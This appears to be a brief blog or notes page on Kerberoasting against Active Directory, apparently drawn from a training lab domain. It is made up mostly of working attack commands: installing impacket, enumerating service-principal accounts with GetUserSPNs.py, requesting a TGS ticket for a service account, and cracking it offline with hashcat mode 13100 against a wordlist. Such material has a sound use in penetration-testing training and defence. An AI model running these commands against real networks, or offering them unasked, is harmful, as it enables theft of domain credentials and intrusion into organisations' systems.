python3 -m pipx install impacket
image

List all SPN Accounts

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/sqldev

Requesting a Single TGS ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/sqldev -request-user SAPService -outputfile sap_tgs

Cracking the Ticket Offline with Hashcat

hashcat -m 13100 sap.txt /usr/share/wordlists/rockyou.txt --force
15890 137378315890
AD Attacks

Sign up to receive awesome content in your inbox, every month.

We don’t spam! Read our privacy policy for more info.